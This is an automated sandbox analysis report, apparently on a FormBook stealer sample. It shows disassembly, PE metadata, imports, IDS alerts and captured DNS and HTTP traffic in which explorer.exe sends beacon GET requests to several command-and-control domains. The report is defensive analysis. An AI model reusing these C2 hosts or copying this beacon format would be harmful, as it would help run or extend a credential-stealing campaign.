call 00007F3494B9B4A4h
cmp eax, ebx
je 00007F3494B986B9h
push 00000C00h
call eax
mov esi, 00407280h
push esi
call 00007F3494B9B420h
push esi
call dword ptr [00407108h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F3494B9869Dh
push 0000000Dh
call 00007F3494B9B478h
push 0000000Bh
call 00007F3494B9B471h
mov dword ptr [0042EC24h], eax
call dword ptr [00407038h]
push ebx
call dword ptr [0040726Ch]
mov dword ptr [0042ECD8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429058h
call dword ptr [0040715Ch]
push 0040915Ch
push 0042E420h
call 00007F3494B9B0A4h
call dword ptr [0040710Ch]
mov ebp, 00434000h
push eax
push ebp
call 00007F3494B9B092h
push ebx
call dword ptr [00407144h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7524	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x37000	0x9e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x27c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5e66	0x6000	False	0.670572916667	data	6.44065573436	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x12a2	0x1400	False	0.4455078125	data	5.0583287871	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x25d18	0x600	False	0.458984375	data	4.18773476617	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x2f000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x37000	0x9e0	0xa00	False	0.45390625	data	4.4968702957	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x37190	0x2e8	data	English	United States
RT_DIALOG	0x37478	0x100	data	English	United States
RT_DIALOG	0x37578	0x11c	data	English	United States
RT_DIALOG	0x37698	0x60	data	English	United States
RT_GROUP_ICON	0x376f8	0x14	data	English	United States
RT_MANIFEST	0x37710	0x2cc	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
USER32.dll	SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
ADVAPI32.dll	RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/28/21-08:05:19.560904	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49777	34.102.136.180	192.168.2.5
09/28/21-08:05:24.814123	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49781	109.106.246.165	192.168.2.5
09/28/21-08:05:30.271587	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49782	80	192.168.2.5	154.208.173.139
09/28/21-08:05:30.271587	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49782	80	192.168.2.5	154.208.173.139
09/28/21-08:05:30.271587	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49782	80	192.168.2.5	154.208.173.139

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2021 08:05:04.067344904 CEST	49775	80	192.168.2.5	35.246.6.109
Sep 28, 2021 08:05:04.102034092 CEST	80	49775	35.246.6.109	192.168.2.5
Sep 28, 2021 08:05:04.103749037 CEST	49775	80	192.168.2.5	35.246.6.109
Sep 28, 2021 08:05:04.103997946 CEST	49775	80	192.168.2.5	35.246.6.109
Sep 28, 2021 08:05:04.139599085 CEST	80	49775	35.246.6.109	192.168.2.5
Sep 28, 2021 08:05:04.181961060 CEST	80	49775	35.246.6.109	192.168.2.5
Sep 28, 2021 08:05:04.181983948 CEST	80	49775	35.246.6.109	192.168.2.5
Sep 28, 2021 08:05:04.182142973 CEST	49775	80	192.168.2.5	35.246.6.109
Sep 28, 2021 08:05:04.182204008 CEST	49775	80	192.168.2.5	35.246.6.109
Sep 28, 2021 08:05:04.216681004 CEST	80	49775	35.246.6.109	192.168.2.5
Sep 28, 2021 08:05:19.300103903 CEST	49777	80	192.168.2.5	34.102.136.180
Sep 28, 2021 08:05:19.316984892 CEST	80	49777	34.102.136.180	192.168.2.5
Sep 28, 2021 08:05:19.317112923 CEST	49777	80	192.168.2.5	34.102.136.180
Sep 28, 2021 08:05:19.317270994 CEST	49777	80	192.168.2.5	34.102.136.180
Sep 28, 2021 08:05:19.334214926 CEST	80	49777	34.102.136.180	192.168.2.5
Sep 28, 2021 08:05:19.560904026 CEST	80	49777	34.102.136.180	192.168.2.5
Sep 28, 2021 08:05:19.560933113 CEST	80	49777	34.102.136.180	192.168.2.5
Sep 28, 2021 08:05:19.561083078 CEST	49777	80	192.168.2.5	34.102.136.180
Sep 28, 2021 08:05:19.561106920 CEST	49777	80	192.168.2.5	34.102.136.180
Sep 28, 2021 08:05:19.864124060 CEST	49777	80	192.168.2.5	34.102.136.180
Sep 28, 2021 08:05:19.883162975 CEST	80	49777	34.102.136.180	192.168.2.5
Sep 28, 2021 08:05:24.641971111 CEST	49781	80	192.168.2.5	109.106.246.165
Sep 28, 2021 08:05:24.666409969 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.666549921 CEST	49781	80	192.168.2.5	109.106.246.165
Sep 28, 2021 08:05:24.666732073 CEST	49781	80	192.168.2.5	109.106.246.165
Sep 28, 2021 08:05:24.692986965 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814122915 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814173937 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814193964 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814209938 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814225912 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814241886 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814258099 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814275026 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814280033 CEST	49781	80	192.168.2.5	109.106.246.165
Sep 28, 2021 08:05:24.814291000 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814305067 CEST	49781	80	192.168.2.5	109.106.246.165
Sep 28, 2021 08:05:24.814312935 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814327002 CEST	49781	80	192.168.2.5	109.106.246.165
Sep 28, 2021 08:05:24.814328909 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814415932 CEST	49781	80	192.168.2.5	109.106.246.165
Sep 28, 2021 08:05:24.814600945 CEST	49781	80	192.168.2.5	109.106.246.165
Sep 28, 2021 08:05:24.838884115 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:30.006370068 CEST	49782	80	192.168.2.5	154.208.173.139
Sep 28, 2021 08:05:30.270998955 CEST	80	49782	154.208.173.139	192.168.2.5
Sep 28, 2021 08:05:30.271218061 CEST	49782	80	192.168.2.5	154.208.173.139
Sep 28, 2021 08:05:30.271586895 CEST	49782	80	192.168.2.5	154.208.173.139
Sep 28, 2021 08:05:30.536212921 CEST	80	49782	154.208.173.139	192.168.2.5
Sep 28, 2021 08:05:30.544342995 CEST	80	49782	154.208.173.139	192.168.2.5
Sep 28, 2021 08:05:30.544578075 CEST	49782	80	192.168.2.5	154.208.173.139
Sep 28, 2021 08:05:30.544688940 CEST	49782	80	192.168.2.5	154.208.173.139
Sep 28, 2021 08:05:30.809536934 CEST	80	49782	154.208.173.139	192.168.2.5
Sep 28, 2021 08:05:35.598473072 CEST	49783	80	192.168.2.5	185.107.56.60
Sep 28, 2021 08:05:35.628887892 CEST	80	49783	185.107.56.60	192.168.2.5
Sep 28, 2021 08:05:35.629040956 CEST	49783	80	192.168.2.5	185.107.56.60
Sep 28, 2021 08:05:35.629242897 CEST	49783	80	192.168.2.5	185.107.56.60
Sep 28, 2021 08:05:35.661778927 CEST	80	49783	185.107.56.60	192.168.2.5
Sep 28, 2021 08:05:36.039222956 CEST	80	49783	185.107.56.60	192.168.2.5
Sep 28, 2021 08:05:36.040755987 CEST	80	49783	185.107.56.60	192.168.2.5
Sep 28, 2021 08:05:36.040757895 CEST	49783	80	192.168.2.5	185.107.56.60
Sep 28, 2021 08:05:36.043976068 CEST	49783	80	192.168.2.5	185.107.56.60
Sep 28, 2021 08:05:36.071099997 CEST	80	49783	185.107.56.60	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2021 08:03:27.087770939 CEST	65307	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:03:27.108354092 CEST	53	65307	8.8.8.8	192.168.2.5
Sep 28, 2021 08:03:40.388488054 CEST	64344	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:03:40.427949905 CEST	53	64344	8.8.8.8	192.168.2.5
Sep 28, 2021 08:03:59.919179916 CEST	62060	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:03:59.946070910 CEST	53	62060	8.8.8.8	192.168.2.5
Sep 28, 2021 08:04:18.782730103 CEST	61805	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:04:18.802819014 CEST	53	61805	8.8.8.8	192.168.2.5
Sep 28, 2021 08:04:28.598836899 CEST	54795	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:04:28.625983000 CEST	53	54795	8.8.8.8	192.168.2.5
Sep 28, 2021 08:04:36.769691944 CEST	49557	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:04:36.798791885 CEST	53	49557	8.8.8.8	192.168.2.5
Sep 28, 2021 08:04:43.480593920 CEST	61733	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:04:43.501585960 CEST	53	61733	8.8.8.8	192.168.2.5
Sep 28, 2021 08:04:53.894303083 CEST	65447	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:04:53.930164099 CEST	53	65447	8.8.8.8	192.168.2.5
Sep 28, 2021 08:04:58.961429119 CEST	52441	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:04:59.015763998 CEST	53	52441	8.8.8.8	192.168.2.5
Sep 28, 2021 08:05:04.024564028 CEST	62176	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:05:04.061494112 CEST	53	62176	8.8.8.8	192.168.2.5
Sep 28, 2021 08:05:09.217550993 CEST	59596	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:05:09.243758917 CEST	53	59596	8.8.8.8	192.168.2.5
Sep 28, 2021 08:05:18.349935055 CEST	65296	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:05:18.377109051 CEST	53	65296	8.8.8.8	192.168.2.5
Sep 28, 2021 08:05:19.275244951 CEST	63183	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:05:19.298926115 CEST	53	63183	8.8.8.8	192.168.2.5
Sep 28, 2021 08:05:20.236413956 CEST	60151	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:05:20.263622999 CEST	53	60151	8.8.8.8	192.168.2.5
Sep 28, 2021 08:05:24.617837906 CEST	56969	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:05:24.640343904 CEST	53	56969	8.8.8.8	192.168.2.5
Sep 28, 2021 08:05:29.822536945 CEST	55161	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:05:30.004734039 CEST	53	55161	8.8.8.8	192.168.2.5
Sep 28, 2021 08:05:35.557977915 CEST	54757	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:05:35.594989061 CEST	53	54757	8.8.8.8	192.168.2.5
Sep 28, 2021 08:05:41.055377007 CEST	49992	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:05:41.079232931 CEST	53	49992	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 28, 2021 08:04:53.894303083 CEST	192.168.2.5	8.8.8.8	0x1e47	Standard query (0)	www.appleluis.host	A (IP address)	IN (0x0001)
Sep 28, 2021 08:04:58.961429119 CEST	192.168.2.5	8.8.8.8	0xcff7	Standard query (0)	www.snackithalal.com	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:04.024564028 CEST	192.168.2.5	8.8.8.8	0x3c1c	Standard query (0)	www.patrickandmaxine.com	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:09.217550993 CEST	192.168.2.5	8.8.8.8	0x1c69	Standard query (0)	www.4-6-2.com	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:19.275244951 CEST	192.168.2.5	8.8.8.8	0xa4e2	Standard query (0)	www.teelandcompany.com	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:24.617837906 CEST	192.168.2.5	8.8.8.8	0x3623	Standard query (0)	www.nailsestetic.space	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:29.822536945 CEST	192.168.2.5	8.8.8.8	0x954b	Standard query (0)	www.futurodr.com	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:35.557977915 CEST	192.168.2.5	8.8.8.8	0x72a2	Standard query (0)	www.babeshotnud.com	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:41.055377007 CEST	192.168.2.5	8.8.8.8	0xe8f5	Standard query (0)	www.thenewtocsin.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 28, 2021 08:04:53.930164099 CEST	8.8.8.8	192.168.2.5	0x1e47	No error (0)	www.appleluis.host	appleluis.host		CNAME (Canonical name)	IN (0x0001)
Sep 28, 2021 08:04:59.015763998 CEST	8.8.8.8	192.168.2.5	0xcff7	Name error (3)	www.snackithalal.com	none	none	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:04.061494112 CEST	8.8.8.8	192.168.2.5	0x3c1c	No error (0)	www.patrickandmaxine.com	www35.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Sep 28, 2021 08:05:04.061494112 CEST	8.8.8.8	192.168.2.5	0x3c1c	No error (0)	www35.wixdns.net	balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Sep 28, 2021 08:05:04.061494112 CEST	8.8.8.8	192.168.2.5	0x3c1c	No error (0)	balancer.wixdns.net	5f36b111-balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Sep 28, 2021 08:05:04.061494112 CEST	8.8.8.8	192.168.2.5	0x3c1c	No error (0)	5f36b111-balancer.wixdns.net	td-balancer-euw2-6-109.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Sep 28, 2021 08:05:04.061494112 CEST	8.8.8.8	192.168.2.5	0x3c1c	No error (0)	td-balancer-euw2-6-109.wixdns.net		35.246.6.109	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:09.243758917 CEST	8.8.8.8	192.168.2.5	0x1c69	Name error (3)	www.4-6-2.com	none	none	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:19.298926115 CEST	8.8.8.8	192.168.2.5	0xa4e2	No error (0)	www.teelandcompany.com	teelandcompany.com		CNAME (Canonical name)	IN (0x0001)
Sep 28, 2021 08:05:19.298926115 CEST	8.8.8.8	192.168.2.5	0xa4e2	No error (0)	teelandcompany.com		34.102.136.180	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:24.640343904 CEST	8.8.8.8	192.168.2.5	0x3623	No error (0)	www.nailsestetic.space	nailsestetic.space		CNAME (Canonical name)	IN (0x0001)
Sep 28, 2021 08:05:24.640343904 CEST	8.8.8.8	192.168.2.5	0x3623	No error (0)	nailsestetic.space		109.106.246.165	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:30.004734039 CEST	8.8.8.8	192.168.2.5	0x954b	No error (0)	www.futurodr.com		154.208.173.139	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:35.594989061 CEST	8.8.8.8	192.168.2.5	0x72a2	No error (0)	www.babeshotnud.com		185.107.56.60	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:41.079232931 CEST	8.8.8.8	192.168.2.5	0xe8f5	No error (0)	www.thenewtocsin.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)
Sep 28, 2021 08:05:41.079232931 CEST	8.8.8.8	192.168.2.5	0xe8f5	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:41.079232931 CEST	8.8.8.8	192.168.2.5	0xe8f5	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:41.079232931 CEST	8.8.8.8	192.168.2.5	0xe8f5	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:41.079232931 CEST	8.8.8.8	192.168.2.5	0xe8f5	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:41.079232931 CEST	8.8.8.8	192.168.2.5	0xe8f5	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:41.079232931 CEST	8.8.8.8	192.168.2.5	0xe8f5	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:41.079232931 CEST	8.8.8.8	192.168.2.5	0xe8f5	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.patrickandmaxine.com

www.teelandcompany.com

www.nailsestetic.space

www.futurodr.com

www.babeshotnud.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49775	35.246.6.109	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 08:05:04.103997946 CEST	5759	OUT	GET /rgoe/?3fph-P=SDpSJcP09/DC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc HTTP/1.1 Host: www.patrickandmaxine.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 28, 2021 08:05:04.181961060 CEST	5760	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 28 Sep 2021 06:05:04 GMT Content-Length: 0 Connection: close location: https://www.patrickandmaxine.com/rgoe?3fph-P=SDpSJcP09%2FDC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc strict-transport-security: max-age=120 x-wix-request-id: 1632809104.12353479359118688 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2 X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVi5yDv3kmVKOr5HAuRayZgu,qquldgcFrj2n046g4RNSVGDCtDC/zjI7y/qL/ByVDnpYgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRalmNz/RuQP3rtdZ/RMDvoHeVyBqs9bMu3gZEQ/tjE7tv/3fKEXQvQlSAkB/lstal9R3MFzREVKyPFapXmT9a+sC4=,2UNV7KOq4oGjA5+PKsX47IJCkNcL1UXXT2AxlbYijuBYgeUJqUXtid+86vZww+nL,YO37Gu9ywAGROWP0rn2IfgW5PRv7IKD225xALAZbAmk=,LXlT8qjS5x6WBejJA3+gBbk0oko9S7vJ2Ws8rbzPIcRNG+KuK+VIZfbNzHJu0vJu,UvY1uiXtmgas6aI2l+unv5E44X1eKbavIjeRM6T+g8dJRdfVwrOGfuCHlvTHdkToWIHlCalF7YnfvOr2cMPpyw== Cache-Control: no-cache X-Content-Type-Options: nosniff Server: Pepyaka/1.19.10

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49777	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 08:05:19.317270994 CEST	5770	OUT	GET /rgoe/?3fph-P=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mN6psbbGTdM&p64=N4Ih-Va0GVIpc HTTP/1.1 Host: www.teelandcompany.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 28, 2021 08:05:19.560904026 CEST	5771	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 28 Sep 2021 06:05:19 GMT Content-Type: text/html Content-Length: 275 ETag: "61525017-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49781	109.106.246.165	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 28, 2021 08:05:24.666732073 CEST	5784	OUT	GET /rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc HTTP/1.1 Host: www.nailsestetic.space Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 28, 2021 08:05:24.814122915 CEST	5785	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Tue, 28 Sep 2021 06:05:24 GMT Content-Length: 13724 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 